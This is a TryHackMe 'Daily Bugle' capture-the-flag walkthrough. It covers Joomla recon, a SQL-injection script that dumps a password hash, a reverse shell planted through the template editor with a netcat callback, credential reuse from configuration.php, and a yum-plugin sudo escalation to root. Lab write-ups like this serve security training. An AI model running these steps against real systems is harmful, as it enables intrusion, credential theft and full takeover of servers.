Tryhackme Daily Bungle

Goal: Get to Root!

1. Gaining shell

Start with the Room I start with simple nmap command, learning from my mistake and have to wait for full 65535 ports scan isn't smart.

┌──(kali㉿kali)-[~]
└─$ nmap -sN  10.10.161.209
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 14:41 +07
Nmap scan report for 10.10.161.209 (10.10.161.209)
Host is up (0.25s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE         SERVICE
22/tcp   open|filtered ssh
80/tcp   open|filtered http
3306/tcp open|filtered mysql

After that I hit

┌──(kali㉿kali)-[~]
└─$ nmap -sV -A -p 22,80,3306  10.10.161.209
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 14:42 +07
Nmap scan report for 10.10.161.209 (10.10.161.209)
Host is up (0.25s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
3306/tcp open  mysql   MariaDB 10.3.23 or earlier (unauthorized)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 (99%), Linux 3.2 - 4.14 (96%), Linux 4.15 - 5.19 (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.4 (96%), Linux 3.10 - 3.13 (95%), Linux 2.6.32 - 3.5 (94%), Linux 2.6.32 - 3.13 (94%), Linux 3.10 - 4.11 (94%), Linux 5.0 - 5.14 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 5 hops

TRACEROUTE (using port 3306/tcp)
HOP RTT       ADDRESS
1   110.89 ms 10.17.0.1 (10.17.0.1)
2   ... 4
5   260.96 ms 10.10.161.209 (10.10.161.209)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.68 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -sN -p- -T4 --min-rate 8000 10.10.161.209
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 14:47 +07
Nmap scan report for 10.10.161.209 (10.10.161.209)
Host is up (0.27s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE         SERVICE
22/tcp   open|filtered ssh
80/tcp   open|filtered http
3306/tcp open|filtered mysql

Nmap done: 1 IP address (1 host up) scanned in 10.50 seconds

With these I saved bunch of time waiting for ports.

I also ran this:

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.10.161.209 -w /usr/share/wordlists/dirb/common.txt -x .php -t 40  

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.161.209
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd.php        (Status: 403) [Size: 215]
/.htaccess            (Status: 403) [Size: 211]
/.hta                 (Status: 403) [Size: 206]
/.htaccess.php        (Status: 403) [Size: 215]
/.htpasswd            (Status: 403) [Size: 211]
/.hta.php             (Status: 403) [Size: 210]
/administrator        (Status: 301) [Size: 243] [--> http://10.10.161.209/administrator/]
/bin                  (Status: 301) [Size: 233] [--> http://10.10.161.209/bin/]
/cache                (Status: 301) [Size: 235] [--> http://10.10.161.209/cache/]
/cgi-bin/             (Status: 403) [Size: 210]
/components           (Status: 301) [Size: 240] [--> http://10.10.161.209/components/]
/configuration.php    (Status: 200) [Size: 0]
/images               (Status: 301) [Size: 236] [--> http://10.10.161.209/images/]
/includes             (Status: 301) [Size: 238] [--> http://10.10.161.209/includes/]
/index.php            (Status: 200) [Size: 9280]
/index.php            (Status: 200) [Size: 9280]
/language             (Status: 301) [Size: 238] [--> http://10.10.161.209/language/]
/layouts              (Status: 301) [Size: 237] [--> http://10.10.161.209/layouts/]
/libraries            (Status: 301) [Size: 239] [--> http://10.10.161.209/libraries/]
/media                (Status: 301) [Size: 235] [--> http://10.10.161.209/media/]
/modules              (Status: 301) [Size: 237] [--> http://10.10.161.209/modules/]
/plugins              (Status: 301) [Size: 237] [--> http://10.10.161.209/plugins/]
/robots.txt           (Status: 200) [Size: 836]
/templates            (Status: 301) [Size: 239] [--> http://10.10.161.209/templates/]
/tmp                  (Status: 301) [Size: 233] [--> http://10.10.161.209/tmp/]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================

Some cool things right here!

Tryhackme also hint at:

Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.

So I immediately visit each enumerate directories to see what's going on, only 2 are up!

http://10.10.161.209/

And

http://10.10.161.209/administrator/

I captured the 2 random login request to both of this site and toss it to SQLmap:

┌──(kali㉿kali)-[~]
└─$ sqlmap -r request-daily-bungle2.txt -p username,password --dbms=MariaDB --dump

...

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:56:01 /2025-05-31/

[14:56:01] [INFO] parsing HTTP request from 'request-daily-bungle2.txt'
[14:56:01] [WARNING] provided parameters 'username, password' are not inside the GET
[14:56:01] [WARNING] provided parameters 'username, password' are not inside the Cookie
[14:56:01] [INFO] testing connection to the target URL
got a 303 redirect to 'http://10.10.161.209/index.php/component/users/?view=login&Itemid=101'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[14:56:13] [INFO] checking if the target is protected by some kind of WAF/IPS
[14:56:14] [INFO] testing if the target URL content is stable
[14:56:16] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[14:56:17] [INFO] testing for SQL injection on POST parameter 'username'
[14:56:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:56:21] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:56:22] [INFO] testing 'Generic inline queries'
[14:56:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:56:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:56:26] [WARNING] time-based comparison requires larger statistical model, please wait................ (done)                                                                                                                          
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[14:56:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:57:02] [WARNING] POST parameter 'username' does not seem to be injectable
[14:57:03] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[14:57:03] [INFO] testing for SQL injection on POST parameter 'password'
[14:57:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:57:07] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:57:08] [INFO] testing 'Generic inline queries'
[14:57:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:57:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:57:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:57:23] [WARNING] POST parameter 'password' does not seem to be injectable
[14:57:23] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 14:57:23 /2025-05-31/

Doesn't seem so promising.

Ok so, let's check if Tryhackme left us any hints?

What is the Joomla version?

I immediately open:

view-source:http://10.10.161.209/administrator/

Scrolling around I saw this:

<html lang="en-gb" dir="ltr">
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta http-equiv="X-UA-Compatible" content="IE=edge" />
	<meta charset="utf-8" />
	<meta name="description" content="New York City tabloid newspaper" />
	<meta name="generator" content="Joomla! - Open Source Content Management" />
	<title>The Daily Bugle - Administration</title>
	<link href="/administrator/templates/isis/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />
	<link href="/administrator/templates/isis/css/template.css?787ff2be3d28e0eefd8e0930f878dbca" rel="stylesheet" />
	<style>

	@media (max-width: 480px) {
		.view-login .container {
			margin-top: -170px;
		}
		.btn {
			font-size: 13px;
			padding: 4px 10px 4px;
		}
	}
	</style>
	<script type="application/json" class="joomla-script-options new">{"system.keepalive":{"interval":840000,"uri":"\/administrator\/index.php"}}</script>
	<script src="/media/system/js/core.js?787ff2be3d28e0eefd8e0930f878dbca"></script>
	<!--[if lt IE 9]><script src="/media/system/js/polyfill.event.js?787ff2be3d28e0eefd8e0930f878dbca"></script><![endif]-->
	<script src="/media/system/js/keepalive.js?787ff2be3d28e0eefd8e0930f878dbca"></script>
	<script src="/media/jui/js/jquery.min.js?787ff2be3d28e0eefd8e0930f878dbca"></script>
	<script src="/media/jui/js/jquery-noconflict.js?787ff2be3d28e0eefd8e0930f878dbca"></script>
	<script src="/media/jui/js/jquery-migrate.min.js?787ff2be3d28e0eefd8e0930f878dbca"></script>
	<script src="/media/jui/js/bootstrap.min.js?787ff2be3d28e0eefd8e0930f878dbca"></script>
	<!--[if lt IE 9]><script src="/media/jui/js/html5.js?787ff2be3d28e0eefd8e0930f878dbca"></script><![endif]-->
	<script>
jQuery(function($){ $(".hasTooltip").tooltip({"html": true,"container": "body"}); });
	</script>

</head>
<body class="site com_login view-login layout-default task- itemid- ">
	<!-- Container -->
	<div class="container">
		<div id="content">
			<!-- Begin Content -->
			<div id="element-box" class="login well">
									<img src="/administrator/templates/isis/images/joomla.png" alt="The Daily Bugle" />
								<hr />
				<div id="system-message-container">
	</div>

Notice these 2:

<link href="/administrator/templates/isis/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />
...
...
<img src="/administrator/templates/isis/images/joomla.png" alt="The Daily Bugle" />

I tried visit:

http://10.10.161.209/administrator/templates/isis/images/

And it's ACCESSIBLE!

I then jump to gobuster!

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.10.161.209/administrator/ -w /usr/share/wordlists/dirb/common.txt -x .php -t 50  

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.161.209/administrator/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd.php        (Status: 403) [Size: 229]
/.htaccess.php        (Status: 403) [Size: 229]
/.htpasswd            (Status: 403) [Size: 225]
/.hta                 (Status: 403) [Size: 220]
/.hta.php             (Status: 403) [Size: 224]
/.htaccess            (Status: 403) [Size: 225]
/cache                (Status: 301) [Size: 249] [--> http://10.10.161.209/administrator/cache/]
/components           (Status: 301) [Size: 254] [--> http://10.10.161.209/administrator/components/]
/help                 (Status: 301) [Size: 248] [--> http://10.10.161.209/administrator/help/]
/includes             (Status: 301) [Size: 252] [--> http://10.10.161.209/administrator/includes/]
/index.php            (Status: 200) [Size: 4846]
/index.php            (Status: 200) [Size: 4846]
/language             (Status: 301) [Size: 252] [--> http://10.10.161.209/administrator/language/]
/logs                 (Status: 301) [Size: 248] [--> http://10.10.161.209/administrator/logs/]
/modules              (Status: 301) [Size: 251] [--> http://10.10.161.209/administrator/modules/]
/templates            (Status: 301) [Size: 253] [--> http://10.10.161.209/administrator/templates/]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================

Looks familiar?

Go back to our nmap result, you can see:

┌──(kali㉿kali)-[~]
└─$ nmap -sV -A -p 22,80,3306  10.10.161.209

...
...

80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40

We should check and visit each directory!

I did just that and I found:

First URL:

http://10.10.161.209/administrator/modules/mod_stats_admin/mod_stats_admin.xml

Show:

<extension type="module" version="3.1" client="administrator" method="upgrade">
<name>mod_stats_admin</name>
<author>Joomla! Project</author>
<creationDate>July 2004</creationDate>
<copyright>
Copyright (C) 2005 - 2017 Open Source Matters. All rights reserved.
</copyright>
<license>
GNU General Public License version 2 or later; see LICENSE.txt
</license>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>3.0.0</version>
<description>MOD_STATS_XML_DESCRIPTION</description>

Second URL:

http://10.10.161.209/administrator/components/com_admin/admin.xml

Show:

<extension type="component" version="3.1" method="upgrade">
<name>com_admin</name>
<author>Joomla! Project</author>
<creationDate>April 2006</creationDate>
<copyright>
(C) 2005 - 2017 Open Source Matters. All rights reserved.
</copyright>
<license>
GNU General Public License version 2 or later; see LICENSE.txt
</license>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>3.0.0</version>
<description>COM_ADMIN_XML_DESCRIPTION</description>
<media/>
<administration>
<files folder="admin">
<filename>admin.php</filename>
<filename>controller.php</filename>
<folder>helpers</folder>
<folder>models</folder>
<folder>views</folder>
</files>
<languages folder="admin">
<language tag="en-GB">language/en-GB.com_admin.ini</language>
<language tag="en-GB">language/en-GB.com_admin.sys.ini</language>
</languages>
</administration>
</extension>

Third URL:

http://10.10.161.209/administrator/language/en-GB/en-GB.xml

Show:

<metafile version="3.7" client="administrator">
<name>English (en-GB)</name>
<version>3.7.0</version>
<creationDate>April 2017</creationDate>
<author>Joomla! Project</author>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<copyright>
Copyright (C) 2005 - 2017 Open Source Matters. All rights reserved.
</copyright>
<license>
GNU General Public License version 2 or later; see LICENSE.txt
</license>
<description>en-GB administrator language</description>
<metadata>
<name>English (en-GB)</name>
<nativeName>English (United Kingdom)</nativeName>
<tag>en-GB</tag>
<rtl>0</rtl>
<locale>
en_GB.utf8, en_GB.UTF-8, en_GB, eng_GB, en, english, english-uk, uk, gbr, britain, england, great britain, uk, united kingdom, united-kingdom
</locale>
<firstDay>0</firstDay>
<weekEnd>0,6</weekEnd>
<calendar>gregorian</calendar>
</metadata>
<params/>

THE CORRECT ANSWER IS 3.7.0

Why?

According to a friend:

Why the language-pack XML gives the right Joomla version while the others don’t

Manifest you looked at

What its <version> actually means

Why it’s not the core CMS version

administrator/modules/mod_stats_admin/mod_stats_admin.xml``administrator/components/com_admin/admin.xml

Version of that single module / component (both happen to be 3.0.0 because they were created when Joomla 3 was first released).

Each extension keeps its own changelog. They don’t bump every time the CMS does.

administrator/language/en-GB/en-GB.xml

Version of the entire language pack build that ships with each Joomla release.

Joomla ships a new language pack for every point release, so its number always mirrors the core version (here 3.7.0).

How the numbering works

Extension manifests (<extension …> … <version>X.Y.Z</version>) X.Y.Z is just the maintainer’s semantic-version for that plugin / module / component. It will stay at 3.0.0 until that specific extension changes.
Schema attribute (<extension type="module" version="3.1">) The version="3.1" up top is the manifest-schema version, not Joomla’s release.
Language-pack manifest (<metafile version="3.7"> … <version>3.7.0</version>) The language files are rebuilt and re-tagged every time Joomla is tagged. So if the site is updated to 3.7.5 you’d see 3.7.5 there.

Because every Joomla installation must have at least one language pack—and that pack’s version is bumped in lock-step with the core—grabbing the value from administrator/language/<lang>/<lang>.xml is the most reliable passive way to fingerprint the running Joomla version.

That’s why TryHackMe expected 3.7.0: it’s the number that reflects the core build, not the frozen extension numbers you saw first.

Cool, Back to gaining foot hold, from searching I found this:

https://github.com/XiphosResearch/exploits/blob/master/Joomblah/joomblah.py

Very convenient?

So let's run it!

┌──(kali㉿kali)-[~/Downloads]
└─$ python2 joomblah.py http://10.10.161.209/

...
...

 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: fb9j5_users
  -  Extracting users from fb9j5_users
 [$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
  -  Extracting sessions from fb9j5_session

There we got: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

Decrypt it with https://hashes.com/en/decrypt/hash we got the password!

Now if we login to the:

http://10.10.161.209

We don't see much.

But if we use login to:

http://10.10.161.209/administrator/

We got our nice admin panel!

Now, I tried metasploit using CVE-2017-8917 https://www.exploit-db.com/exploits/44358

┌──(kali㉿kali)-[~/Downloads]
└─$ msfconsole
...
...
msf6 > use exploit/unix/webapp/joomla_comfields_sqli_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > options
...
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > set RHOSTS 10.10.161.209
RHOSTS => 10.10.161.209
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > set LHOST [YOUR IP]
LHOST => [YOUR IP]
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > run
[*] Started reverse TCP handler on [YOUR IP]:4444 
[-] Exploit aborted due to failure: unknown: 10.10.161.209:80 - Error retrieving table prefix
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > check
[*] 10.10.161.209:80 - The target is not exploitable.
...

Seems like we need another entry point.

No worries, we are now web admin, let's execute the shell ourselves!

Now if you go to:

Choose template:

http://10.10.161.209/administrator/index.php?option=com_templates&view=templates

Choose Beez3:

http://10.10.161.209/administrator/index.php?option=com_templates&view=template&id=503&file=aG9tZQ==

And choose: Editor -> html -> modules.php

Set up our netcat:

nc -lvnp 4444

Edit it, paste our reverse shell, press save and preview.

┌──(kali㉿kali)-[~/Downloads]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [[YOUR IP]] from (UNKNOWN) [10.10.161.209] 42262
Linux dailybugle 3.10.0-1062.el7.x86_64 #1 SMP Wed Aug 7 18:08:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 05:21:30 up  1:52,  0 users,  load average: 0.01, 0.04, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.2$c cd /tmp

We got our Reverse shell!

2. Privilege Escalation

Let's set up our python server and upload linpeas.sh

python3 -m http.server 80

Then:

bash-4.2$ wget http://[YOUR IP]:80/linpeas.sh
wget http://[YOUR IP]:80/linpeas.sh
--2025-05-31 05:30:36--  http://[YOUR IP]/linpeas.sh
Connecting to [YOUR IP]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 839046 (819K) [text/x-sh]
Saving to: 'linpeas.sh'

100%[======================================>] 839,046      253KB/s   in 3.2s   

2025-05-31 05:30:40 (253 KB/s) - 'linpeas.sh' saved [839046/839046]

bash-4.2$ chmod 777 linpeas.sh
chmod 777 linpeas.sh
bash-4.2$ ./linpeas.sh

Earlier, we can see that, Tryhackme hint at the fact that we might need to privilege escalate from yum, we might try sudo -l to check if we have right to run password-less yum:

bash-4.2$ sudo -n -l
sudo -n -l
sudo: a password is required

This means we need credential of another user to login, luckily, if we go back to our linpeas.sh results:

╔══════════╣ Searching passwords in config PHP files
/var/www/html/configuration.php:        public $password = 'nv5uz9r3ZEDzVjNu';                                                                                                                                                             
/var/www/html/libraries/joomla/log/logger/database.php:                 $this->password = (empty($this->options['db_pass'])) ? '' : $this->options['db_pass'];
/var/www/html/libraries/joomla/log/logger/database.php:                 $this->password = null;
/var/www/html/libraries/joomla/log/logger/database.php:                 'password' => $this->password,

Let's try it!:

bash-4.2$ su jjameson
su jjameson
Password: nv5uz9r3ZEDzVjNu

[jjameson@dailybugle tmp]$ sudo -l
sudo -l
Matching Defaults entries for jjameson on dailybugle:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum

Great, so our user jjameson has privilege to run sudo yum with out password.

The privilege from yum below can be found here:

https://gtfobins.github.io/gtfobins/yum/

Escalate from jjameson to root:

[jjameson@dailybugle tmp]$ TF=$(mktemp -d)
TF=$(mktemp -d)
[jjameson@dailybugle tmp]$ cat >$TF/x<<EOF
cat >$TF/x<<EOF
> [main]
[main]
> plugins=1
plugins=1
> pluginpath=$TF
pluginpath=$TF
> pluginconfpath=$TF
pluginconfpath=$TF
> EOF
EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.conf<<EOF
cat >$TF/y.conf<<EOF
> [main]
[main]
> enabled=1
enabled=1
> EOF
EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.py<<EOF
cat >$TF/y.py<<EOF
> import os
import os
> import yum
import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
requires_api_version='2.1'
> def init_hook(conduit):
def init_hook(conduit):
>   os.execl('/bin/sh','/bin/sh')
  os.execl('/bin/sh','/bin/sh')
> EOF
EOF
[jjameson@dailybugle tmp]$ sudo yum -c $TF/x --enableplugin=y
sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# whoami
whoami
root
sh-4.2# python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
[root@dailybugle tmp.xUQmxLM2mw]# cat /root/root.txt
cat /root/root.txt
#flaghidden
[root@dailybugle tmp.xUQmxLM2mw]# cat /home/jjameson/user.txt
cat /home/jjameson/user.txt
#flaghidden

NextTryhackme - Internal - The Easy Way Walkthrough

Last updated 10 months ago

hashtagGoal: Get to Root!

hashtag1. Gaining shell

hashtagFirst URL:

hashtagSecond URL:

hashtagThird URL:

hashtagTHE CORRECT ANSWER IS 3.7.0

hashtagWhy the language-pack XML gives the right Joomla version while the others don’t

hashtag2. Privilege Escalation

Goal: Get to Root!

1. Gaining shell

First URL:

Second URL:

Third URL:

THE CORRECT ANSWER IS 3.7.0

Why the language-pack XML gives the right Joomla version while the others don’t

2. Privilege Escalation